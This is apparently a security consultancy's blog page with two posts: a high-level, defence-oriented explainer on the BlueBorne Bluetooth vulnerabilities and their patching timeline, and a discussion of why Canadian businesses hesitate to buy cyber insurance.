The security research firm Armis first identified the BlueBorne malware. Researchers at the research firm found that BlueBorne malware specifically exploits the security flaw in Bluetooth-enabled devices running on Windows, Android, pre-version 10 of iOS and Linux operating systems, regardless of the Bluetooth version in use. This means that every single computer, mobile device or IoT device running on one of the above-mentioned operating systems is at risk. There are currently 2 billion Android users, 500 million Windows 10 users, 1 billion Apple users, and 8 billion IoT users. Affected devices include all Android phones, tablets and wearables (except those using only Bluetooth Low Energy), all Windows computers since Windows Vista and all Linux devices like Samsung Gear S3, Samsung Smart TVs and Samsung Family Hub. 2. BlueBorne spreads through the air. BlueBorne is alarming as it operates through the air. Unlike traditional cyber attacks, no action is required from the victim to enable the BlueBorne attack – no need to download a malicious file or click on a link. Once the malware detects the Bluetooth is active on a device that runs on Windows, Android, pre-version 10 of iOS or Linux operating system, it attacks it despite the fact that the targeted device isn’t paired with the attacker’s device or set on discoverable mode. “Unlike the common misconception, Bluetooth enabled devices are constantly searching for incoming connections from any devices, and not only those they have been paired with,” Armis said. To initiate BlueBorne, the attacker must be near the targeted user and the Bluetooth feature of the target user's device must be turned on. Billions of devices are at risk as Bluetooth is turned on by default on many devices. Many users also prefer to turn on Bluetooth most of the time to conveniently connect it to keyboards, headphones and other various IoT devices. The airborne operation of BlueBorne is problematic in the following ways: a) Highly Infectious Spreading from one device to another through the air makes BlueBorne highly infectious since the Bluetooth process enjoys high privileges on all operating systems. Exploiting Bluetooth gives hackers full control over the device. b) Bypasses Traditional Cyber Security Measures As BlueBorne is spread through the air, it bypasses traditional cyber security measures. Typical security measures are defenseless against airborne attacks. BlueBorne attackers can bypass secure internal “air-gapped” networks – a security measure that isolates a computer or network and prevents it from establishing an external connection. "These silent attacks are invisible to traditional security controls and procedures. Companies don't monitor these types of device-to-device connections in their environment, so they can't see these attacks or stop them," Yevgeny Dibrov, CEO of Armis, said in a statement. "The research illustrates the types of threats facing us in this new connected age." 3 Ways BlueBorne Attackers Could Exploit Your Device
1. Take Full Control of Your Device for Criminal Activities
BlueBorne attackers could remotely execute code on your vulnerable device, allowing the attackers to take full control over your device, access corporate networks, systems and data. With full access to your device, hackers could perform criminal activities, including ransomware and data theft. 2. Create Large Botnets Similar to the Mirai Botnet Mirai botnet uses compromised IoT devices to carry out crippling Distributed Denial of Service attacks (DDoS) attacks. In 2016, crippling DDoS attacks were waged against the website of cyber security blogger Brian Krebs and a French web hosting company. BlueBorne attackers, for instance, could use your compromised device, together with other compromised devices, to execute DDoS against a particular website. 3. Perform Man-in-The-Middle Attack BlueBorne attackers could perform a man-in-the-middle attack on your device. Man-in-the-middle attack happens when attackers redirect the communication between two users to the attackers’ computer without the knowledge of the original two users. “An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer,” Microsoft said in its September 12, 2017 security bulletin. “The attacker can then monitor and read the traffic before sending it on to the intended recipient.” Microsoft calls this Bluetooth vulnerability as "Microsoft Bluetooth Driver Spoofing Vulnerability". How to Prevent BlueBorne Attacks
1. Turn Bluetooth Off
The safest way to prevent a BlueBorne attack is by turning off the Bluetooth feature on your device. This malware can access your device only when it’s in the active mode. If it’s turned off, the malware can’t successfully infiltrate your device. 2. Update Your Operating System It’s advisable to keep your operating system up-to-date. Not all operating systems though have patched or issued a security update that fixes BlueBorne vulnerability. According to Armis, it informed Google about the BlueBorne issue on April 19, 2017. Google released a public security update and security bulletin on September 4th, 2017. Microsoft was informed by Armis about the BlueBorne issue on April 19, 2017. Microsoft released security updates on July 11, 2017. Apple was informed about BlueBorne on August 9, 2017. Apple corrected this vulnerability with its latest iOS and tvOS. Linux was informed by Armis on August 15 and 17, 2017 and on September 5, 2017. As of September 12, 2017, Armis said, Linux hasn't yet issued a public security update to patch the BlueBorne malware. Is Cyber Insurance for Small and Medium Businesses Worth the Cost?
More than one-third or 36% of Canadian firms don’t have cyber security insurance, this according to a survey conducted by research and consultancy firm Ovum for Silicon Valley analytics firm FICO.
This number, however, is relatively high compared to the global average (40%) and the percentage of firms in the U.S. that have no cyber security insurance (50%). Reasons Why Some Organizations Hesitate to Get Cyber Security Insurance
Here are some of the reasons why some organizations hesitate to get cyber security insurance:
1. Organizations Often Don’t Understand Cyber Risks or Their Insurance Options In the report "Demystifying cyber insurance coverage: Clearing obstacles in a problematic but promising growth market", researchers from the Deloitte Center for Financial Services found that many organizations – including large, medium and small businesses – often aren’t aware of the cyber risks confronting them, let alone the insurance coverage options available to them. 2. Lack of Understanding as to What Type of Cyber Risk Is and Isn’t Covered under Existing Insurance Policies For the Canadian firms that have cyber security insurance in the FICO survey, only 18% said their cyber security insurance covers all likely risks. In the case of The Brick Warehouse LP v Chubb Insurance Company of Canada, the Court of Queen’s Bench of Alberta decided on June 29, 2017 that Brick isn’t entitled to recover its loss from insurer Chubb. The case arises from a social engineering cyber fraud scheme. In 2010, the accounting department of Brick received bogus calls and emails from an individual claiming to be a representative of Toshiba, one of Brick’s suppliers. The imposter asked a Brick employee that payment to supposedly Toshiba should be changed to a new bank account. A total of $338,322.22 was transferred into the “new” account. Brick filed a claim with its insurer Chubb asserting that under its cyber security insurance policy Chubb will pay for direct loss resulting from funds transfer fraud by a third party. “Certainly, the emails with the fraudulent instructions were from a third party,” the Court of Queen’s Bench of Alberta said. “The actual transfer instructions; however, were issued by a Brick employee. There was no one forcing the employee to issue the instructions, there were no threats of violence or other harm. The employee was simply a pawn in the fraudster’s scheme. Therefore, the transfer was not done by a third party.” According to the Deloitte report, cyber security insurance policy terms and conditions in Canada have yet to be battle-tested as case law isn’t clear. The Brick Warehouse LP v Chubb Insurance Company of Canada is the first case decided by a Canadian court with respect to cyber crime insurance coverage. 3. Concern about Cyber Security Insurance Value The Deloitte report showed that many organizations still wonder whether the cyber security insurance coverage being offered by insurers is sufficient for the risks they face. The Deloitte report revealed that current cyber insurance policies are often capped with relatively low limits for the risks being covered, which may be discouraging more organizations in getting cyber insurance. The report added that cyber insurance coverage for emerging cyber risks may not yet be widely available or affordable. Twenty percent of the FICO survey respondents felt that the premiums calculated based on their business don’t accurately reflect their risk profile. 4. Lack of Standardization around Cyber Insurance Offerings Given that the cyber insurance market is relatively new, insurance coverage terms, conditions and exclusions are still not standardized. The 2016 SANS Institute and Advisen, Ltd. study (PDF) found that information security officers of organizations and insurance professionals don’t speak the same language when defining and quantifying cyber risks, resulting in different expectations, actions and justification for outcomes. The 2017 “Cyber Insurance Market Watch Survey” (PDF) by the Council of Insurance Agents & Brokers found that cyber insurance companies have their own policy language which makes it difficult to compare coverage and terms. More than a quarter or 26% of the FICO survey respondents felt that the introduction of an established industry standard to benchmark cyber security risk would be beneficial. Importance of Getting Cyber Security Insurance
"While digitisation is revolutionising business models and transforming daily lives, it is also making the global economy more vulnerable to cyber-attacks,” Lloyd's and Cyence said in the report "Counting the cost Cyber exposure decoded".
“Without cyber-risk insurance, organizations are leaving themselves in a very vulnerable position,” said Kevin Deveau, vice president and managing director of FICO Canada. “It’s important for businesses to assess the strength of their cybersecurity defences and to make sure they are covered if they are faced with a data breach.” Legislation is expected to drive demand for cyber insurance cover, particularly surrounding data and privacy. In Europe, the implementation of the EU law General Data Protection Regulation (GDPR) in 2018 is expected to drive the demand for cyber insurance as the EU law introduces new fines for failing to adequately protect sensitive data and mandating companies to notify the authorities and the individuals affected by the data breach. According to Lloyd's and Cyence, “Demand for cyber insurance is also anticipated to increase penetration in Europe as a result of the General Data Protection Regulation coming into force next year, with the threat of penalties for breaches driving coverage.” In Canada, the upcoming implementation of the Digital Privacy Act is expected to drive the demand for cyber insurance. It amends Canada’s Personal Information Protection and Electronic Documents Act. The Digital Privacy Act became a law in June 2015. The law’s implementation is held in abeyance until the government issues the implementing regulations. The 2015 law requires organizations to report any significant, potentially harmful security breach of personal information to Canada’s Privacy Commissioner and to immediately inform the affected individuals and organizations. Non-compliance of the notification requirements may lead to fines of up to $100,000 per violation. “The ripple effect of a breach can be felt throughout the organization for a very long time, especially now that Canada’s Digital Privacy Act will require organizations to report any breaches to regulators and customers,” the vice president and managing director of FICO Canada said. |
AuthorSteve E. Driz, I.S.P., ITCP Archives
February 2024
Categories
All
|
3/11/2019
0 Comments